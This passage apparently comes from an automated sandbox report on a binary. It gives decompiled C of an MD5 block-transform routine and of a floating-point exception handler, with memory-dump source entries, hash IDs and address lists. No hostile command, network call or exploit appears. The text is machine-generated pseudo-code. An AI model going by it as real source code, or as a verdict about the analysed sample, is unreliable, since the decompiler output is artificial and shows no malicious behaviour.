                                                                                                                                                                                                                                				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                                                                                                                                                                				_t349 =  *_t8;
                                                                                                                                                                                                                                				asm("rol eax, 0x7");
                                                                                                                                                                                                                                				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                                                                                                                                                                                                                				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                                                                                                                                                                                                                				asm("ror edx, 0xf");
                                                                                                                                                                                                                                				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                                                                                                                                                                                                                				asm("ror esi, 0xa");
                                                                                                                                                                                                                                				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                                                                                                                                                                                                                				_v8 = _t685;
                                                                                                                                                                                                                                				_t690 = _v8;
                                                                                                                                                                                                                                				asm("rol eax, 0x7");
                                                                                                                                                                                                                                				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                                                                                                                                                                                                                				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                                                                                                                                                                                                                				asm("ror edx, 0xf");
                                                                                                                                                                                                                                				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                                                                                                                                                                                                                				asm("ror esi, 0xa");
                                                                                                                                                                                                                                				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                                                                                                                                                                                                                				_v8 = _t692;
                                                                                                                                                                                                                                				_t697 = _v8;
                                                                                                                                                                                                                                				asm("rol eax, 0x7");
                                                                                                                                                                                                                                				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                                                                                                                                                                                                                				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                                                                                                                                                                                                                				asm("ror edx, 0xf");
                                                                                                                                                                                                                                				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                                                                                                                                                                                                                				asm("ror esi, 0xa");
                                                                                                                                                                                                                                				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                                                                                                                                                                                                                				_v8 = _t699;
                                                                                                                                                                                                                                				asm("rol eax, 0x7");
                                                                                                                                                                                                                                				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                                                                                                                                                                				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                                                                                                                                                                                                                				_t508 =  !_t357;
                                                                                                                                                                                                                                				asm("ror edx, 0xf");
                                                                                                                                                                                                                                				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                                                                                                                                                                                                                				_v12 = _t410;
                                                                                                                                                                                                                                				_v12 =  !_v12;
                                                                                                                                                                                                                                				asm("ror esi, 0xa");
                                                                                                                                                                                                                                				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                                                                                                                                                                                                                				asm("rol eax, 0x5");
                                                                                                                                                                                                                                				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                                                                                                                                                                                                                				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                                                                                                                                                                                                                				asm("rol edx, 0xe");
                                                                                                                                                                                                                                				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                                                                                                                                                                                                                				asm("ror esi, 0xc");
                                                                                                                                                                                                                                				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                                                                                                                                                                                                                				asm("rol eax, 0x5");
                                                                                                                                                                                                                                				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                                                                                                                                                                                                                				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                                                                                                                                                                                                                				asm("rol edx, 0xe");
                                                                                                                                                                                                                                				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                                                                                                                                                                                                                				asm("ror esi, 0xc");
                                                                                                                                                                                                                                				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                                                                                                                                                                                                                				asm("rol eax, 0x5");
                                                                                                                                                                                                                                				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                                                                                                                                                                                                                				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                                                                                                                                                                                                                				asm("rol edx, 0xe");
                                                                                                                                                                                                                                				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                                                                                                                                                                                                                				asm("ror esi, 0xc");
                                                                                                                                                                                                                                				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                                                                                                                                                                                                                				asm("rol eax, 0x5");
                                                                                                                                                                                                                                				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                                                                                                                                                                                                                				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                                                                                                                                                                                                                				asm("rol edx, 0xe");
                                                                                                                                                                                                                                				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                                                                                                                                                                                                                				asm("ror esi, 0xc");
                                                                                                                                                                                                                                				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                                                                                                                                                                                                                				asm("rol eax, 0x4");
                                                                                                                                                                                                                                				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                                                                                                                                                                                                                				asm("rol ecx, 0xb");
                                                                                                                                                                                                                                				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                                                                                                                                                                                                                				asm("rol edx, 0x10");
                                                                                                                                                                                                                                				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                                                                                                                                                                                                                				_t599 = _t367 ^ _t420;
                                                                                                                                                                                                                                				asm("ror esi, 0x9");
                                                                                                                                                                                                                                				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                                                                                                                                                                                                                				asm("rol eax, 0x4");
                                                                                                                                                                                                                                				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                                                                                                                                                                                                                				asm("rol edi, 0xb");
                                                                                                                                                                                                                                				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                                                                                                                                                                                                                				asm("rol edx, 0x10");
                                                                                                                                                                                                                                				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                                                                                                                                                                                                                				_t338 = _t607 ^ _t422;
                                                                                                                                                                                                                                				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                                                                                                                                                                                                                				asm("rol eax, 0x4");
                                                                                                                                                                                                                                				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                                                                                                                                                                                                                				asm("rol esi, 0xb");
                                                                                                                                                                                                                                				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                                                                                                                                                                                                                				asm("rol edi, 0x10");
                                                                                                                                                                                                                                				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                                                                                                                                                                                                                				_t424 = _t734 ^ _t613;
                                                                                                                                                                                                                                				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                                                                                                                                                                                                                				asm("rol eax, 0x4");
                                                                                                                                                                                                                                				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                                                                                                                                                                                                                				asm("rol edx, 0xb");
                                                                                                                                                                                                                                				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                                                                                                                                                                                                                				asm("rol esi, 0x10");
                                                                                                                                                                                                                                				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                                                                                                                                                                                                                				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                                                                                                                                                                                                                				asm("rol eax, 0x6");
                                                                                                                                                                                                                                				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                                                                                                                                                                                                                				asm("rol edx, 0xa");
                                                                                                                                                                                                                                				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                                                                                                                                                                                                                				asm("rol esi, 0xf");
                                                                                                                                                                                                                                				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                                                                                                                                                                                                                				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                                                                                                                                                                                                                				asm("rol eax, 0x6");
                                                                                                                                                                                                                                				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                                                                                                                                                                                                                				asm("rol edx, 0xa");
                                                                                                                                                                                                                                				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                                                                                                                                                                                                                				asm("rol esi, 0xf");
                                                                                                                                                                                                                                				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                                                                                                                                                                                                                				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                                                                                                                                                                                                                				asm("rol eax, 0x6");
                                                                                                                                                                                                                                				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                                                                                                                                                                                                                				asm("rol edx, 0xa");
                                                                                                                                                                                                                                				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                                                                                                                                                                                                                				asm("rol esi, 0xf");
                                                                                                                                                                                                                                				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                                                                                                                                                                                                                				asm("ror edi, 0xb");
                                                                                                                                                                                                                                				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                                                                                                                                                                                                                				asm("rol eax, 0x6");
                                                                                                                                                                                                                                				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                                                                                                                                                                                                                				asm("rol edx, 0xa");
                                                                                                                                                                                                                                				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                                                                                                                                                                                                                				_t400 = _a4;
                                                                                                                                                                                                                                				asm("rol esi, 0xf");
                                                                                                                                                                                                                                				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                                                                                                                                                                                                                				 *_t400 =  *_t400 + _t259;
                                                                                                                                                                                                                                				asm("ror eax, 0xb");
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                                                                                                                                                                                                                				return memset( &_v76, 0, 0x40);
                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                0x00a8365a
                                                                                                                                                                                                                                0x00a8365d
                                                                                                                                                                                                                                0x00a83673
                                                                                                                                                                                                                                0x00a83676
                                                                                                                                                                                                                                0x00a8368a
                                                                                                                                                                                                                                0x00a8368d
                                                                                                                                                                                                                                0x00a8369f
                                                                                                                                                                                                                                0x00a836a2
                                                                                                                                                                                                                                0x00a836b6
                                                                                                                                                                                                                                0x00a836b9
                                                                                                                                                                                                                                0x00a836cd
                                                                                                                                                                                                                                0x00a836d0
                                                                                                                                                                                                                                0x00a836e4
                                                                                                                                                                                                                                0x00a836ed
                                                                                                                                                                                                                                0x00a836f0
                                                                                                                                                                                                                                0x00a836f9
                                                                                                                                                                                                                                0x00a83702
                                                                                                                                                                                                                                0x00a8370a
                                                                                                                                                                                                                                0x00a83712
                                                                                                                                                                                                                                0x00a8371c
                                                                                                                                                                                                                                0x00a83731

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                                                                                • Opcode ID: 9e272f4f369135326a610e9d97de374ff2095c53d9b8e94d8a5de78a0905f596
                                                                                                                                                                                                                                • Instruction ID: 32e27fc6434b93b593e6703167855d84671ced95f80aa5c391953c29a7fb27c9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e272f4f369135326a610e9d97de374ff2095c53d9b8e94d8a5de78a0905f596
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1222747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736E05D3(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                				signed int _t172;
                                                                                                                                                                                                                                				signed int _t175;
                                                                                                                                                                                                                                				signed int _t178;
                                                                                                                                                                                                                                				signed int* _t179;
                                                                                                                                                                                                                                				signed char _t193;
                                                                                                                                                                                                                                				signed int _t196;
                                                                                                                                                                                                                                				signed int _t200;
                                                                                                                                                                                                                                				signed int _t203;
                                                                                                                                                                                                                                				void* _t204;
                                                                                                                                                                                                                                				void* _t207;
                                                                                                                                                                                                                                				signed int _t210;
                                                                                                                                                                                                                                				void* _t211;
                                                                                                                                                                                                                                				signed int _t226;
                                                                                                                                                                                                                                				unsigned int* _t241;
                                                                                                                                                                                                                                				signed char _t243;
                                                                                                                                                                                                                                				signed int* _t251;
                                                                                                                                                                                                                                				unsigned int* _t257;
                                                                                                                                                                                                                                				signed int* _t258;
                                                                                                                                                                                                                                				signed char _t260;
                                                                                                                                                                                                                                				long _t263;
                                                                                                                                                                                                                                				signed int* _t266;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				 *(_a4 + 4) = 0;
                                                                                                                                                                                                                                				_t263 = 0xc000000d;
                                                                                                                                                                                                                                				 *(_a4 + 8) = 0;
                                                                                                                                                                                                                                				 *(_a4 + 0xc) = 0;
                                                                                                                                                                                                                                				_t243 = _a12;
                                                                                                                                                                                                                                				if((_t243 & 0x00000010) != 0) {
                                                                                                                                                                                                                                					_t263 = 0xc000008f;
                                                                                                                                                                                                                                					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if((_t243 & 0x00000002) != 0) {
                                                                                                                                                                                                                                					_t263 = 0xc0000093;
                                                                                                                                                                                                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if((_t243 & 0x00000001) != 0) {
                                                                                                                                                                                                                                					_t263 = 0xc0000091;
                                                                                                                                                                                                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if((_t243 & 0x00000004) != 0) {
                                                                                                                                                                                                                                					_t263 = 0xc000008e;
                                                                                                                                                                                                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if((_t243 & 0x00000008) != 0) {
                                                                                                                                                                                                                                					_t263 = 0xc0000090;
                                                                                                                                                                                                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t266 = _a8;
                                                                                                                                                                                                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                                                                                                                                                                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
                                                                                                                                                                                                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                                                                                                                                                                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                                                                                                                                                                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
                                                                                                                                                                                                                                				_t260 = E736DFFFA(_a4);
                                                                                                                                                                                                                                				if((_t260 & 0x00000001) != 0) {
                                                                                                                                                                                                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if((_t260 & 0x00000004) != 0) {
                                                                                                                                                                                                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if((_t260 & 0x00000008) != 0) {
                                                                                                                                                                                                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if((_t260 & 0x00000010) != 0) {
                                                                                                                                                                                                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if((_t260 & 0x00000020) != 0) {
                                                                                                                                                                                                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t172 =  *_t266 & 0x00000c00;
                                                                                                                                                                                                                                				if(_t172 == 0) {
                                                                                                                                                                                                                                					 *_a4 =  *_a4 & 0xfffffffc;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_t172 == 0x400) {
                                                                                                                                                                                                                                						_t258 = _a4;
                                                                                                                                                                                                                                						_t226 =  *_t258 & 0xfffffffd | 1;
                                                                                                                                                                                                                                						L26:
                                                                                                                                                                                                                                						 *_t258 = _t226;
                                                                                                                                                                                                                                						L29:
                                                                                                                                                                                                                                						_t175 =  *_t266 & 0x00000300;
                                                                                                                                                                                                                                						if(_t175 == 0) {
                                                                                                                                                                                                                                							_t251 = _a4;
                                                                                                                                                                                                                                							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
                                                                                                                                                                                                                                							L35:
                                                                                                                                                                                                                                							 *_t251 = _t178;
                                                                                                                                                                                                                                							L36:
                                                                                                                                                                                                                                							_t179 = _a4;
                                                                                                                                                                                                                                							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                                                                                                                                                                							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                                                                                                                                                                							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                                                                                                                                                                                                							if(_a28 == 0) {
                                                                                                                                                                                                                                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                                                                                                                                                                                                								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                                                                                                                                                                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                                                                                                                                                                								_t255 = _a4;
                                                                                                                                                                                                                                								_t241 = _a24;
                                                                                                                                                                                                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                                                                                                                                                                                                								 *(_a4 + 0x50) =  *_t241;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                                                                                                                                                                                                								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                                                                                                                                                                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                                                                                                                                                                								_t241 = _a24;
                                                                                                                                                                                                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                                                                                                                                                                                                								 *(_a4 + 0x50) =  *_t241;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							E736DFF60(_t255);
                                                                                                                                                                                                                                							RaiseException(_t263, 0, 1,  &_a4);
                                                                                                                                                                                                                                							_t257 = _a4;
                                                                                                                                                                                                                                							_t193 = _t257[2];
                                                                                                                                                                                                                                							if((_t193 & 0x00000010) != 0) {
                                                                                                                                                                                                                                								 *_t266 =  *_t266 & 0xfffffffe;
                                                                                                                                                                                                                                								_t193 = _t257[2];
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if((_t193 & 0x00000008) != 0) {
                                                                                                                                                                                                                                								 *_t266 =  *_t266 & 0xfffffffb;
                                                                                                                                                                                                                                								_t193 = _t257[2];
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if((_t193 & 0x00000004) != 0) {
                                                                                                                                                                                                                                								 *_t266 =  *_t266 & 0xfffffff7;
                                                                                                                                                                                                                                								_t193 = _t257[2];
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if((_t193 & 0x00000002) != 0) {
                                                                                                                                                                                                                                								 *_t266 =  *_t266 & 0xffffffef;
                                                                                                                                                                                                                                								_t193 = _t257[2];
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if((_t193 & 0x00000001) != 0) {
                                                                                                                                                                                                                                								 *_t266 =  *_t266 & 0xffffffdf;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t196 =  *_t257 & 0x00000003;
                                                                                                                                                                                                                                							if(_t196 == 0) {
                                                                                                                                                                                                                                								 *_t266 =  *_t266 & 0xfffff3ff;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t207 = _t196 - 1;
                                                                                                                                                                                                                                								if(_t207 == 0) {
                                                                                                                                                                                                                                									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
                                                                                                                                                                                                                                									L55:
                                                                                                                                                                                                                                									 *_t266 = _t210;
                                                                                                                                                                                                                                									L58:
                                                                                                                                                                                                                                									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
                                                                                                                                                                                                                                									if(_t200 == 0) {
                                                                                                                                                                                                                                										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
                                                                                                                                                                                                                                										L64:
                                                                                                                                                                                                                                										 *_t266 = _t203;
                                                                                                                                                                                                                                										L65:
                                                                                                                                                                                                                                										if(_a28 == 0) {
                                                                                                                                                                                                                                											 *_t241 = _t257[0x14];
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											 *_t241 = _t257[0x14];
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										return _t203;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t204 = _t200 - 1;
                                                                                                                                                                                                                                									if(_t204 == 0) {
                                                                                                                                                                                                                                										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
                                                                                                                                                                                                                                										goto L64;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t203 = _t204 - 1;
                                                                                                                                                                                                                                									if(_t203 == 0) {
                                                                                                                                                                                                                                										 *_t266 =  *_t266 & 0xfffff3ff;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L65;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t211 = _t207 - 1;
                                                                                                                                                                                                                                								if(_t211 == 0) {
                                                                                                                                                                                                                                									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
                                                                                                                                                                                                                                									goto L55;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								if(_t211 == 1) {
                                                                                                                                                                                                                                									 *_t266 =  *_t266 | 0x00000c00;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L58;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t175 == 0x200) {
                                                                                                                                                                                                                                							_t251 = _a4;
                                                                                                                                                                                                                                							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
                                                                                                                                                                                                                                							goto L35;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t175 == 0x300) {
                                                                                                                                                                                                                                							 *_a4 =  *_a4 & 0xffffffe3;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L36;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t172 == 0x800) {
                                                                                                                                                                                                                                						_t258 = _a4;
                                                                                                                                                                                                                                						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
                                                                                                                                                                                                                                						goto L26;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t172 == 0xc00) {
                                                                                                                                                                                                                                						 *_a4 =  *_a4 | 0x00000003;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}
























                                                                                                                                                                                                                                0x736e063f
                                                                                                                                                                                                                                0x736e0644
                                                                                                                                                                                                                                0x736e0649
                                                                                                                                                                                                                                0x736e0649
                                                                                                                                                                                                                                0x736e0651
                                                                                                                                                                                                                                0x736e0661
                                                                                                                                                                                                                                0x736e0673
                                                                                                                                                                                                                                0x736e0685
                                                                                                                                                                                                                                0x736e0698
                                                                                                                                                                                                                                0x736e06aa
                                                                                                                                                                                                                                0x736e06b2
                                                                                                                                                                                                                                0x736e06b7
                                                                                                                                                                                                                                0x736e06bc
                                                                                                                                                                                                                                0x736e06bc
                                                                                                                                                                                                                                0x736e06c3
                                                                                                                                                                                                                                0x736e06c8
                                                                                                                                                                                                                                0x736e06c8
                                                                                                                                                                                                                                0x736e06cf
                                                                                                                                                                                                                                0x736e06d4
                                                                                                                                                                                                                                0x736e06d4
                                                                                                                                                                                                                                0x736e06db
                                                                                                                                                                                                                                0x736e06e0
                                                                                                                                                                                                                                0x736e06e0
                                                                                                                                                                                                                                0x736e06e7
                                                                                                                                                                                                                                0x736e06ec
                                                                                                                                                                                                                                0x736e06ec
                                                                                                                                                                                                                                0x736e06f6
                                                                                                                                                                                                                                0x736e06f8
                                                                                                                                                                                                                                0x736e0732
                                                                                                                                                                                                                                0x736e06fa
                                                                                                                                                                                                                                0x736e06ff
                                                                                                                                                                                                                                0x736e0723
                                                                                                                                                                                                                                0x736e072b
                                                                                                                                                                                                                                0x736e071f
                                                                                                                                                                                                                                0x736e071f
                                                                                                                                                                                                                                0x736e0735
                                                                                                                                                                                                                                0x736e073c
                                                                                                                                                                                                                                0x736e073e
                                                                                                                                                                                                                                0x736e0760
                                                                                                                                                                                                                                0x736e0768
                                                                                                                                                                                                                                0x736e076b
                                                                                                                                                                                                                                0x736e076b
                                                                                                                                                                                                                                0x736e076d
                                                                                                                                                                                                                                0x736e076d
                                                                                                                                                                                                                                0x736e0778
                                                                                                                                                                                                                                0x736e077e
                                                                                                                                                                                                                                0x736e0783
                                                                                                                                                                                                                                0x736e078a
                                                                                                                                                                                                                                0x736e07c4
                                                                                                                                                                                                                                0x736e07cf
